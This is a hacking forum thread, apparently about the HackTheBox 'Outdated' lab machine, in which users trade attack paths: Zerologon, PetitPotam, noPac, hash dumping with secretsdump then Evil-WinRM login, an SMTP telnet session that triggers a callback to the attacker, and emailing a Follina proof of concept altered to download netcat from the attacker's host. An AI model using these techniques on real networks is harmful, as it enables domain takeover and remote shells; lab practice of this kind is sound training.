Return to forum

JohnRaid · August 14, 2022 at 11:20 AM

thanx u man

infosecsy19 · August 14, 2022 at 11:28 AM

(August 13, 2022, 09:02 PM)yumi Wrote: sssssssssss

hb86125295 · August 14, 2022 at 11:46 AM

(August 13, 2022, 09:02 PM)yumi Wrote: :sleepy:

undeadly · August 14, 2022 at 1:17 PM

(August 13, 2022, 10:30 PM)yumi Wrote: if I get users i will warn you here with more details, I tried zero logon the first time, but I didn't realize that it had worked, I always try on a windows machine, and with the name outdated I tried several vulnerabilities zero logon worked and the petitpotam partially worked because there was no way to access certsrv remotely in this machine.
(August 13, 2022, 10:27 PM)JINXX Wrote:
(August 13, 2022, 09:41 PM)undeadly Wrote: sadly bug on the box. the intended way should be probably dealing with hmail and group policies.
if an author will fix this fast, it still be playable.
    Directory: C:\Users\Administrator\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/16/2022  11:05 AM                SQL Server Management Studio
d-----        6/16/2022  11:05 AM                Visual Studio 2017
d-----        6/16/2022  12:07 AM                WindowsPowerShell
-a----         8/1/2022   6:38 PM           7023 hmail_cleanup.ps1
-a----         8/3/2022   4:18 PM            978 install_updates.ps1
-a----        6/16/2022   6:51 PM            518 wsus_group_cleanup.ps1


*Evil-WinRM* PS C:\Users\Administrator\Documents>
How did you achieve a shell with evilwinrm

How did you achieve a shell with evilwinrm
get hash from secretsdump and acess with evil-winrm

in your "list of tryings" you may also include noPac. however, you need to own at least one standard domain user first.
Anubis machine was (and still is) vulnerable to noPac -> where it was pretty easy to get a shell on the box and then impersonate admin in under 30 minutes in "Insane" level box. sometimes author just can't cover all windows breaches.
https://github.com/Ridter/noPac

ILoveNSA · August 14, 2022 at 1:28 PM

(August 14, 2022, 10:34 AM)xiorat89 Wrote:
(August 13, 2022, 07:48 PM)fironeDerbert Wrote:
(August 13, 2022, 07:43 PM)Hacker2222 Wrote: quick root blood ..... must be cve for insta root?

Run this line by line and you'll get a ping on your port 80
telnet mail.outdated.htb 25
HELO client
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Subject: abc

http://10.10.XX.XX/XX
.
QUIT
Does this work for other people? This was the first thing I tried with swaks and manually and I never got any request

Yes, I did get a response, though I am not entirely sure how one is supposed to leverage that. I tried giving it a link to a follina docx, no luck.

catdog · August 14, 2022 at 1:57 PM

(August 13, 2022, 09:02 PM)yumi Wrote: show me

elliotal · August 14, 2022 at 2:24 PM

Im stuck on user

yumi · August 14, 2022 at 2:45 PM

for users just use Follina poc from john hammond.

sendemail with attachment or link.

change script to download netcat from you and dont from github

zero logon patched

HDplus · August 14, 2022 at 3:09 PM

(August 13, 2022, 08:59 PM)JINXX Wrote:
(August 13, 2022, 08:54 PM)yumi Wrote: zerologon worked

rooted

Can you help with more info on this please

Thanks

K4RMA · August 14, 2022 at 5:37 PM

thanks